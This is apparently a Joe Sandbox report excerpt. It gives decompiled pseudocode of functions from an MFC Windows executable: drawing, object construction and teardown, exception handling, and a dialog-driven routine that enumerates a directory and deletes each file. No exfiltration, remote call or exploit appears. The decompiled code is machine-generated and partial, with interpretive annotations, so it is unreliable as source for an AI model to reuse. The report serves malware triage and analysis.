    • Instruction ID: 383a8b6c402a69219dc45ddaf8d89b64e1b1a77421f91e11c687aff65abc395c
    • Opcode Fuzzy Hash: 56567f191300ebdc2aa62c89ead3a7aec4aff7847f2036aa5403ab8f2e3b9c60
    • Instruction Fuzzy Hash: 82016D31500208AFCB14AF60E841B997B60BB153A9F20953BF926662D2E7389B59D618
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0040E6E1(void* __ecx) {
    				void* _t18;
    				int _t19;
    				void* _t32;
    
    				E0043E4E0(0x440148, _t32);
    				_push( *((intOrPtr*)(_t32 + 0x1c)));
    				L0043E132();
    				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
    				_t18 = _t32 - 0x14;
    				_push(_t18);
    				L0043E12C();
    				_t19 = PatBlt( *( *((intOrPtr*)(_t32 + 8)) + 4),  *(_t32 + 0xc),  *(_t32 + 0x10),  *(_t32 + 0x14),  *(_t32 + 0x18), 0xf00021);
    				_push(_t18);
    				L0043E12C();
    				 *((intOrPtr*)(_t32 - 0x14)) = 0x445440;
    				 *(_t32 - 4) = 1;
    				L0043DD72();
    				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
    				return _t19;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040E6E6
    • #283.MFC42(?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E6F5
    • #5788.MFC42(?,?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E707
    • PatBlt.GDI32(00000000,?,?,?,?,00F00021), ref: 0040E722
    • #5788.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E72B
    • #2414.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E741
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5788$#2414#283H_prolog
    • String ID: @TD
    • API String ID: 2944278317-549275915
    • Opcode ID: 52ebffd27f7c178886eaaabaf272c573f45670bdf8741eba118a83788a9a6adc
    • Instruction ID: ef99ff5f0362d1c5c1558fa9b1fa4c268aeb4576bd53e5dcf2ec4f4fd943af46
    • Opcode Fuzzy Hash: 52ebffd27f7c178886eaaabaf272c573f45670bdf8741eba118a83788a9a6adc
    • Instruction Fuzzy Hash: 50F08C72500109ABCF01EF92CD06BEEBB79EF88348F00401EF90566292CB799A24DB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040E07A(intOrPtr __ecx) {
    				intOrPtr _t30;
    				void* _t32;
    
    				E0043E4E0(0x440078, _t32);
    				_push(__ecx);
    				_t30 = __ecx;
    				 *((intOrPtr*)(_t32 - 0x10)) = __ecx;
    				L0043DF64();
    				 *((intOrPtr*)(__ecx)) = 0x446660;
    				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
    				L0043DDD8();
    				 *(__ecx + 0x58) =  *(__ecx + 0x58) & 0x00000000;
    				 *((intOrPtr*)(__ecx + 0x54)) = 0x44615c;
    				 *(__ecx + 0x60) =  *(__ecx + 0x60) & 0x00000000;
    				 *((intOrPtr*)(__ecx + 0x5c)) = 0x44615c;
    				 *(__ecx + 0x68) =  *(__ecx + 0x68) & 0x00000000;
    				 *((intOrPtr*)(__ecx + 0x64)) = 0x445468;
    				 *(_t32 - 4) = 4;
    				L0043DDD8();
    				 *((intOrPtr*)(__ecx)) = 0x446b68;
    				 *((intOrPtr*)(_t30 + 0x50)) = GetSysColor(0xf);
    				 *((intOrPtr*)(_t30 + 0x48)) = 0x190;
    				 *((intOrPtr*)(_t30 + 0x44)) = 0xc;
    				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
    				return _t30;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#567ColorH_prolog
    • String ID: hTD$C
    • API String ID: 51933270-3350089059
    • Opcode ID: 817b0c87b830998d9f9980eb79a3cbfaab87fcf5a91b595c2255a959ad698267
    • Instruction ID: fcc37cde1e1617dd15859a7bbaa9c72ef7877a644b6c57f4322b9692761d81ca
    • Opcode Fuzzy Hash: 817b0c87b830998d9f9980eb79a3cbfaab87fcf5a91b595c2255a959ad698267
    • Instruction Fuzzy Hash: DA0112B1851B508FE720DF69D50539ABBF0EF08719F00882EE18286A81D7BDA548CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75% (addresses folded in from the export's per-line column; call names taken from the APIs list below. The three _CxxThrowException calls and the writes to _v4, the EH state slot at [ebp-4], show that the decompiler has merged a function's throw and catch funclets into one listing, which is why the control flow reads oddly)
    			E00403695(intOrPtr* _a8, intOrPtr* _a12) {
    				char _v4;
    				intOrPtr* _v24;
    				char _v28;
    				char _v32;
    				intOrPtr* _v36;
    				intOrPtr* _v44;
    				intOrPtr _v48;
    				signed int _v60;
    				char _v408;
    				char _v664;
    				intOrPtr _t43;
    				char _t44;
    				intOrPtr _t53;
    				char _t54;
    				intOrPtr _t67;
    				intOrPtr* _t73;
    				intOrPtr* _t74;
    
    				_t73 = _v24;  // 0x00403698
    				_v44 = _t73;  // 0x0040369b
    				 *((intOrPtr*)( *_a8 + 0x38))();  // 0x004036a0  virtual call through _a8
    				 *((intOrPtr*)( *_a12 + 0x44))();  // 0x004036a8  virtual call through _a12
    				_t43 =  *((intOrPtr*)( *_t73 + 0x14))( &_v664, 0xff, 0);  // 0x004036bd  virtual call that fills the 0xff-byte buffer _v664
    				_push(0x10);  // 0x004036c0
    				L0043DD54();  // 0x004036c2  #823.MFC42: operator new(0x10); its result is what _t43 holds below (the decompiler kept the earlier name)
    				_a8 = _t43;  // 0x004036c8
    				_v4 = 0xa;  // 0x004036cd  EH state 10
    				if(_t43 == 0) {  // 0x004036d1
    					_t44 = 0;  // 0x004036e6  allocation failed: no object
    				} else {  // 0x004036d3
    					_push( &_v664);  // 0x004036d9
    					_push( *((intOrPtr*)(_t73 + 8)));  // 0x004036dc
    					_t44 = E00403862(_t43);  // 0x004036df  constructs the new 0x10-byte object (subcall: __EH_prolog, #350.MFC42, #537.MFC42 CString from char*)
    				}  // 0x004036df
    				_v32 = _t44;  // 0x004036e8
    				_v4 = 9;  // 0x004036f4  EH state 9
    				L0043E528();  // 0x004036f8  _CxxThrowException(&_v32, 0x44AC58): throws the object
    				_v36 = _v24;  // 0x00403705
    				L0043DE2C();  // 0x0040370f  #5628.MFC42
    				L0043DDA2();  // 0x00403714  #1264.MFC42
    				L0043E528();  // 0x0040371d  _CxxThrowException(0, 0): rethrow of the exception being handled
    				_t74 = _v24;  // 0x00403725
    				_v36 = _t74;  // 0x00403728
    				 *((intOrPtr*)( *_a8 + 0x38))(0, 0,  &_v408,  &_v32, 0x44ac58);  // 0x0040372d
    				 *((intOrPtr*)( *_a12 + 0x44))();  // 0x00403735
    				_t53 =  *((intOrPtr*)( *_t74 + 0x14))( &_v664, 0xff, 0);  // 0x0040374a  same virtual call as above
    				L0043DD54();  // 0x0040374f  #823.MFC42: operator new(0x10) again; _t53 below is its result
    				_t67 = 0x10;  // 0x00403754
    				_a8 = _t53;  // 0x00403755
    				_v4 = 3;  // 0x0040375a  EH state 3
    				if(_t53 == 0) {  // 0x0040375e
    					_t54 = 0;  // 0x00403773
    				} else {  // 0x00403760
    					_push( &_v664);  // 0x00403766
    					_t67 = _t53;  // 0x00403767
    					_push( *((intOrPtr*)(_t74 + 8)));  // 0x00403769
    					_t54 = E00403862(_t67);  // 0x0040376c  same constructor
    				}  // 0x0040376c
    				_v28 = _t54;  // 0x00403775
    				_push(0x44ac58);  // 0x0040377b  same throw-info pointer as the first throw
    				_push( &_v28);  // 0x00403780
    				_v4 = 2;  // 0x00403781  EH state 2
    				L0043E528();  // 0x00403785  _CxxThrowException(&_v28, 0x44AC58)
    				_push(_t67);  // 0x0040378d
    				_v60 = _v60 & 0x00000000;  // 0x0040378e
    				_push(_t67 + 4);  // 0x00403795
    				L0043DD3C();  // 0x00403799  #535.MFC42: CString copy constructor
    				return _v48;  // 0x004037a2
    			}

    APIs
    • #823.MFC42(00000010), ref: 004036C2
    • _CxxThrowException.MSVCRT(?,0044AC58), ref: 004036F8
    • #5628.MFC42(?,?,0044AC58), ref: 0040370F
    • #1264.MFC42(?,?,0044AC58), ref: 00403714
    • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0040371D
    • #823.MFC42(00000010), ref: 0040374F
    • _CxxThrowException.MSVCRT(?,0044AC58), ref: 00403785
    • #535.MFC42(?,?,?,?,0044AC58), ref: 00403799
      • Part of subcall function 00403862: __EH_prolog.LIBCMT ref: 00403867
      • Part of subcall function 00403862: #350.MFC42(?,?,0040333B,?,?), ref: 00403873
      • Part of subcall function 00403862: #537.MFC42(?,?,?,0040333B,?,?), ref: 00403888
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: ExceptionThrow$#823$#1264#350#535#537#5628H_prolog
    • String ID:
    • API String ID: 216941690-0
    • Opcode ID: b1c42561fc01e0e306c22f0807ad9f072f9b7db322414ad92d059e5220d86ede
    • Instruction ID: 761ca4f1101e26c843b1174fb7b7b65db187916399e1db1a8b6ae42cd91817be
    • Opcode Fuzzy Hash: b1c42561fc01e0e306c22f0807ad9f072f9b7db322414ad92d059e5220d86ede
    • Instruction Fuzzy Hash: 35315E71A00208AFDB44DFA9D845BED7BF4AF08305F1044AEF509E7291DB749A44CB69
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #4710.MFC42 ref: 0041986B
    • #1779.MFC42(00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080), ref: 004198E6
    • #1779.MFC42(00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF), ref: 004198FD
    • #1779.MFC42(00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 00419914
    • #1779.MFC42(00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0041992B
    • #1779.MFC42(0000042A,?,00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001), ref: 00419942
    • #1779.MFC42(0000080F,?,0000042A,?,00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF,00010101,00808080), ref: 00419959
    • #1779.MFC42(0000042B,?,0000080F,?,0000042A,?,00000429,?,00000428,?,00000427,?,00000421,?,?,00EFEFEF), ref: 00419970
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1779$#4710
    • String ID:
    • API String ID: 2950569931-0
    • Opcode ID: 870db30d4787f2a8a84b9bf8d72d01d894e7bcafa7fb1fc7817d85e38a29538f
    • Instruction ID: 6e9bc034436d086fb2d0abc6a9a07030acd277da4720c2757fe4b2011958ecf9
    • Opcode Fuzzy Hash: 870db30d4787f2a8a84b9bf8d72d01d894e7bcafa7fb1fc7817d85e38a29538f
    • Instruction Fuzzy Hash: 1D2197717447507EE120A256DC92FB73ADCDB8AB08F0404AEB7C69B2D2C995BE008774
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73% (addresses folded in from the export's per-line column; call names from the APIs list below. This is a teardown routine: each E004xxxxx subcall hands back an object, which is then either passed to operator delete or destroyed through its vtable)
    			E0040B651(void* __ecx, void* __eflags) {
    				intOrPtr* _t11;
    				intOrPtr* _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    				intOrPtr* _t19;
    				intOrPtr* _t21;
    				intOrPtr* _t23;
    				intOrPtr* _t24;
    				intOrPtr* _t35;
    				intOrPtr* _t36;
    				intOrPtr* _t37;
    				void* _t47;
    
    				_push(E0040949A(__ecx));  // 0x0040b657  subcall: __EH_prolog, then #823.MFC42 operator new(4)
    				L0043DD42();  // 0x0040b658  #825.MFC42: operator delete on the pointer just pushed
    				_push(E00409797(__ecx));  // 0x0040b662  subcall: __EH_prolog, #823.MFC42 operator new(4)
    				L0043DD42();  // 0x0040b663  #825.MFC42
    				_pop(_t35);  // 0x0040b669
    				_t11 = E0040A372(_t35);  // 0x0040b66a  subcall: __EH_prolog, #823.MFC42 operator new(4)
    				_t47 = 1;  // 0x0040b673
    				if(_t11 != 0) {  // 0x0040b674
    					_t35 = _t11;  // 0x0040b679
    					 *((intOrPtr*)( *_t11 + 0x10))(_t47);  // 0x0040b67b  vtable slot +0x10 called with flag 1: the MSVC scalar deleting destructor (run the destructor, then free)
    				}  // 0x0040b67b
    				_push(E0040904E(_t35));  // 0x0040b683
    				L0043DD42();  // 0x0040b684  #825.MFC42
    				_push(E00409365(_t35));  // 0x0040b68e
    				L0043DD42();  // 0x0040b68f  #825.MFC42
    				_push(E00409207(_t35));  // 0x0040b699
    				L0043DD42();  // 0x0040b69a  #825.MFC42
    				_push(E0040A8C1(_t35));  // 0x0040b6a4
    				L0043DD42();  // 0x0040b6a5  #825.MFC42
    				_t16 = E00409D76(_t35);  // 0x0040b6ad
    				if(_t16 != 0) {  // 0x0040b6b4
    					_t35 = _t16;  // 0x0040b6b9
    					 *((intOrPtr*)( *_t16 + 0x10))(_t47);  // 0x0040b6bb  deleting destructor
    				}  // 0x0040b6bb
    				_t17 = E00409F58(_t35);  // 0x0040b6be
    				if(_t17 != 0) {  // 0x0040b6c5
    					_t35 = _t17;  // 0x0040b6ca
    					 *((intOrPtr*)( *_t17 + 0x10))(_t47);  // 0x0040b6cc  deleting destructor
    				}  // 0x0040b6cc
    				_t18 = E00409999(_t35);  // 0x0040b6cf
    				if(_t18 != 0) {  // 0x0040b6d6
    					_t35 = _t18;  // 0x0040b6db
    					 *((intOrPtr*)( *_t18 + 0x10))(_t47);  // 0x0040b6dd  deleting destructor
    				}  // 0x0040b6dd
    				_t19 = E0040AC1B(_t35);  // 0x0040b6e0
    				if(_t19 != 0) {  // 0x0040b6e7
    					_t35 = _t19;  // 0x0040b6ec
    					 *((intOrPtr*)( *_t19 + 0x10))(_t47);  // 0x0040b6ee  deleting destructor
    				}  // 0x0040b6ee
    				_push(E0040A58A(_t35));  // 0x0040b6f6
    				L0043DD42();  // 0x0040b6f7  #825.MFC42
    				_pop(_t36);  // 0x0040b6fc
    				_t21 = E0040A784(_t36);  // 0x0040b6fd
    				if(_t21 != 0) {  // 0x0040b704
    					_t36 = _t21;  // 0x0040b709
    					 *((intOrPtr*)( *_t21 + 0x10))(_t47);  // 0x0040b70b  deleting destructor
    				}  // 0x0040b70b
    				_push(E0040AA23(_t36));  // 0x0040b713
    				L0043DD42();  // 0x0040b714  #825.MFC42
    				_pop(_t37);  // 0x0040b719
    				_t23 = E0040AEAA(_t37);  // 0x0040b71a
    				if(_t23 != 0) {  // 0x0040b721
    					_t37 = _t23;  // 0x0040b726
    					 *((intOrPtr*)( *_t23 + 0x10))(_t47);  // 0x0040b728  deleting destructor
    				}  // 0x0040b728
    				_t24 = E0040B3CF(_t37);  // 0x0040b72b
    				if(_t24 != 0) {  // 0x0040b732
    					return  *((intOrPtr*)( *_t24 + 0x10))(_t47);  // deleting destructor as a tail call; the export gives this line no address of its own
    				}  // 0x0040b739
    				return _t24;  // 0x0040b73d
    			}

    APIs
      • Part of subcall function 0040949A: __EH_prolog.LIBCMT ref: 0040949F
      • Part of subcall function 0040949A: #823.MFC42(00000004,?,0040FCBD,?,00000000), ref: 004094B0
    • #825.MFC42(00000000), ref: 0040B658
      • Part of subcall function 00409797: __EH_prolog.LIBCMT ref: 0040979C
      • Part of subcall function 00409797: #823.MFC42(00000004,?,0040FCDC,?,00000000), ref: 004097AD
    • #825.MFC42(00000000,00000000), ref: 0040B663
      • Part of subcall function 0040A372: __EH_prolog.LIBCMT ref: 0040A377
      • Part of subcall function 0040A372: #823.MFC42(00000004,?,0040FBC5,?,00000000), ref: 0040A388
    • #825.MFC42(00000000), ref: 0040B684
    • #825.MFC42(00000000,00000000), ref: 0040B68F
    • #825.MFC42(00000000,00000000,00000000), ref: 0040B69A
    • #825.MFC42(00000000,00000000,00000000,00000000), ref: 0040B6A5
    • #825.MFC42(00000000), ref: 0040B6F7
    • #825.MFC42(00000000), ref: 0040B714
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #825$#823H_prolog
    • String ID:
    • API String ID: 1008532540-0
    • Opcode ID: 00b7107851fe791512cf7eddc90873cffb4ea20f7ebae22799c832a40660c797
    • Instruction ID: 2f8f934b634f41c432f7d4e00069e9b20cc5b8c098b10a1fcd2bd7ff21feef71
    • Opcode Fuzzy Hash: 00b7107851fe791512cf7eddc90873cffb4ea20f7ebae22799c832a40660c797
    • Instruction Fuzzy Hash: B221E060A103015BDA187BB69C0AA5F366DAFC9348B10487FB401EB2D7DE7DCC8186ED
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85% (addresses folded in from the export's per-line column; call names from the APIs list below. The routine runs a dialog, and if it returns 1 it executes up to three cleanup actions selected by dialog fields, one of which, E004251F0, walks a directory with FindFirstFileA/FindNextFileA and calls DeleteFileA on each entry, then reports through a string resource written into control 0x426)
    			E00419AC9(intOrPtr __ecx, void* __eflags) {
    				void* _t34;
    				void* _t35;
    				signed int _t47;
    				void* _t72;
    				void* _t76;
    
    				E0043E4E0(0x4411a7, _t76);  // 0x00419ace  __EH_prolog: SEH frame, handler table at 0x4411a7
    				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;  // 0x00419adb  this saved in the frame
    				_push(0);  // 0x00419ae1  second constructor argument
    				_t34 = E0041951B(_t76 - 0x1a0);  // 0x00419ae8  constructs the dialog object in the frame (subcall: __EH_prolog, #324.MFC42(000000B1, ?), the CDialog constructor with template ID 0xB1)
    				_t47 = 1;  // 0x00419af5
    				 *(_t76 - 4) = 0;  // 0x00419af6  EH state 0: the dialog object needs destruction on unwind
    				 *(_t76 - 0x28) = _t47;  // 0x00419af9  four fields of the dialog object default to TRUE before it runs
    				 *(_t76 - 0x1c) = _t47;  // 0x00419afc
    				 *(_t76 - 0x24) = _t47;  // 0x00419aff
    				 *(_t76 - 0x20) = _t47;  // 0x00419b02
    				L0043DE7A();  // 0x00419b05  #2514.MFC42: CDialog::DoModal; its return value is what the next line tests (the decompiler kept the name _t34 for eax)
    				if(_t34 == _t47) {  // 0x00419b0c  DoModal returned 1 (IDOK)
    					L0043E1C2();  // 0x00419b12  #1168.MFC42: AfxGetModuleState
    					_t72 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 4)))) + 0x7c))();  // 0x00419b24  module state +4 is the inline AfxGetApp(); then a virtual call (vtable +0x7c) on the application object
    					if( *(_t76 - 0x24) != 0) {  // 0x00419b26  first option still set
    						E004251F0();  // 0x00419b2a  enumerate-and-delete loop: FindFirstFileA, DeleteFileA per entry, FindNextFileA, FindClose (see the subcall entries under APIs)
    					}  // 0x00419b2a
    					if( *(_t76 - 0x20) != 0) {  // 0x00419b32  second option
    						E004254F6(_t72);  // 0x00419b36
    					}  // 0x00419b36
    					if( *(_t76 - 0x1c) != 0) {  // 0x00419b3e  third option
    						E004251E1(_t72);  // 0x00419b42
    					}  // 0x00419b42
    					if( *(_t76 - 0x28) == 0) {  // 0x00419b4a  fourth option off, or E004207A5 below says so: use string 0xe061
    						L10:  // 0x00419b8a
    						_push( *((intOrPtr*)(E00429029(_t76 - 0x18, 0xe061))));  // 0x00419b9a  E00429029 loads string resource 0xe061 into a CString (subcall: #1168, LoadStringA, #537)
    						 *(_t76 - 4) = 2;  // 0x00419b9f  EH state 2: that CString is live
    						_push(0x426);  // 0x00419ba3  control ID 0x426
    						L0043E066();  // 0x00419ba8  #3092.MFC42: CWnd::GetDlgItem(0x426)
    						L0043E15C();  // 0x00419baf  #6199.MFC42: CWnd::SetWindowTextA on that control
    						_t25 = _t76 - 4;  // 0x00419bb4
    						 *_t25 =  *(_t76 - 4) & 0x00000000;  // 0x00419bb4  EH state back to 0
    						__eflags =  *_t25;  // 0x00419bb4
    					} else {  // 0x00419b4c
    						_t15 = _t72 + 0x78; // 0x78  // 0x00419b4c
    						if(E004207A5(_t15) != 0) {  // 0x00419b56
    							goto L10;  // synthesised by the decompiler, no address of its own
    						} else {  // 0x00419b58  otherwise string 0xe060
    							_push( *((intOrPtr*)(E00429029(_t76 - 0x14, 0xe060))));  // 0x00419b68
    							 *(_t76 - 4) = _t47;  // 0x00419b6d  EH state 1
    							_push(0x426);  // 0x00419b70
    							L0043E066();  // 0x00419b75  #3092.MFC42: GetDlgItem(0x426)
    							L0043E15C();  // 0x00419b7c  #6199.MFC42: SetWindowTextA
    							 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;  // 0x00419b81
    						}  // 0x00419b85
    					}  // 0x00419b56
    					L0043DD36();  // 0x00419bbb  #800.MFC42: CString destructor for the loaded string
    				}  // 0x00419bbb
    				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;  // 0x00419bc0  EH state -1: nothing left to unwind
    				_t35 = E004195B1(_t76 - 0x1a0,  *(_t76 - 4));  // 0x00419bca  destroys the dialog object
    				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));  // 0x00419bd5  unlink the SEH frame
    				return _t35;  // 0x00419bdd
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00419ACE
      • Part of subcall function 0041951B: __EH_prolog.LIBCMT ref: 00419520
      • Part of subcall function 0041951B: #324.MFC42(000000B1,?), ref: 00419535
    • #2514.MFC42 ref: 00419B05
    • #1168.MFC42 ref: 00419B12
    • #3092.MFC42(00000426,00000000), ref: 00419B75
    • #6199.MFC42(00000426,00000000), ref: 00419B7C
    • #800.MFC42(00000426,00000000), ref: 00419BBB
      • Part of subcall function 004251F0: __EH_prolog.LIBCMT ref: 004251F5
      • Part of subcall function 004251F0: #536.MFC42(0000005C,00000001,00000000,00000000,00000001), ref: 0042520A
      • Part of subcall function 004251F0: #924.MFC42(?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425225
      • Part of subcall function 004251F0: #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425234
      • Part of subcall function 004251F0: #924.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425247
      • Part of subcall function 004251F0: #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425253
      • Part of subcall function 004251F0: #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042525F
      • Part of subcall function 004251F0: #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042526B
      • Part of subcall function 004251F0: FindFirstFileA.KERNEL32(?,?,?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042527A
      • Part of subcall function 004251F0: #537.MFC42(?), ref: 00425295
      • Part of subcall function 004251F0: #537.MFC42(00448FA4,?), ref: 004252A5
